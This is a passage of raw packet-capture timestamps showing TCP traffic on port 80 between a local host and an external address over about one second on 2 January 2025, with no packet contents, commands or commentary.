                                                                        Jan 2, 2025 19:14:09.861715078 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.861776114 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.861803055 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.866547108 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.866559982 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.866635084 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.950128078 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.950189114 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.950215101 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.950227976 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.950238943 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.950309038 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.950397968 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.950611115 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.950623035 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.950634003 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.950645924 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.950663090 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.950700045 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.951210022 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.951221943 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.951234102 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.951245070 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.951256037 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.951268911 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.951283932 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.951303005 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.951946974 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.951957941 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.951971054 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.951981068 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.951992989 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.952013016 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.952035904 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.952805042 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.952846050 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.952851057 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:09.952858925 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:09.952898026 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.038765907 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.038785934 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.038855076 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.038868904 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.038882017 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.038892984 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.038903952 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.038942099 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.038964987 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.039242029 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039361954 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039410114 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.039412022 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039427042 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039437056 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039462090 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.039752007 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039764881 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039777040 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039787054 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039797068 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039803028 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.039809942 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.039835930 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.040443897 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.040457964 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.040494919 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.040504932 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.040522099 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.040534019 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.040546894 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.040549994 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.040561914 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.040574074 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.040579081 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.040601015 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.041516066 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.041527987 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.041538954 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.041549921 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.041559935 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.041568041 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.041572094 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.041584969 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.041594982 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.041598082 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.041616917 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.041636944 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.042397976 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.042411089 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.042421103 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.042445898 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.042464018 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.042479038 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.042490005 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.042505980 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.042516947 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.042526960 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.042534113 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.042552948 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.043354034 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.043373108 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.043385029 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.043417931 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.043438911 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.043720961 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.043740988 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.043781996 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.127912045 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.127937078 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.127954960 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.127974033 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.127985001 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.127995968 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128000975 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128007889 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128022909 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128076077 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128097057 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128108978 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128118038 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128129005 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128139973 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128148079 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128153086 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128165960 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128170013 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128180027 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128196001 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128197908 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128213882 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128215075 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128228903 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128238916 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128249884 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128258944 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128261089 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128274918 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128278017 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128314972 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128346920 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128411055 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128458023 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128464937 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128477097 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128488064 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128498077 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128513098 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128516912 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128525019 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128535986 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128537893 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128550053 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128552914 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128583908 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128721952 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128734112 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128745079 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128757000 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128767014 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128772974 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128778934 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128802061 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128817081 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128824949 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128837109 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128846884 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128859043 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.128880024 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128890038 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.128899097 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129183054 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129194021 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129211903 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129224062 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129225016 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129235983 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129246950 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129251003 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129259109 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129268885 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129298925 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129301071 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129312038 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129348040 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129353046 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129364014 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129379034 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129391909 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129400015 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129404068 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129416943 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129420996 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129452944 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129451036 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129471064 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129482985 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129498959 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129499912 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129512072 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129523039 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129527092 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129534006 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129547119 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.129561901 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.129571915 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.130162954 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.130175114 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.130184889 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.130196095 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.130206108 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.130211115 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.130218029 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.130239964 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.130253077 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.175220966 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.175235987 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.175246954 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.175374031 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.215178013 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.215207100 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.215305090 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.216115952 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216129065 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216145992 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216162920 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216173887 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216183901 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216192961 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.216197014 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216208935 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216242075 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216244936 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.216264009 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.216267109 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216285944 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216325998 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.216341019 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216352940 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216375113 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216391087 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.216413021 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.216428041 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216439009 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216449976 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216461897 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216478109 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.216511965 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.216526985 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216567039 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216579914 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.216624022 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.375633001 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.556200027 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.560981989 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.738917112 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.738940954 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.738998890 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739028931 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739223003 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739233971 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739244938 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739255905 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739267111 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739270926 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739279985 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739291906 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739303112 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739320040 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739321947 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739331961 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739343882 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739346981 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739352942 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739361048 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739372969 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739384890 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739396095 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739397049 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739428997 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739448071 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739464998 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739497900 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739509106 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739518881 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739547014 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739573002 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739645958 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739659071 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739669085 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739679098 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739689112 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739700079 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739711046 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739722967 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739744902 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739779949 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.739965916 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739978075 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.739989042 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740000010 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740009069 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740014076 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.740021944 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740039110 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740050077 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740061045 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740071058 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740075111 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.740082979 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740093946 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740104914 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740115881 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740117073 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.740127087 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740137100 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.740139961 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740155935 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.740178108 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.740384102 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740447998 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740461111 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740472078 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740482092 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740504026 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.740518093 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740530014 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740535975 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.740540981 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.740559101 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.740591049 CET4971680192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:10.743985891 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.744003057 CET8049716147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:10.744014025 CET8049716147.45.44.131192.168.2.5
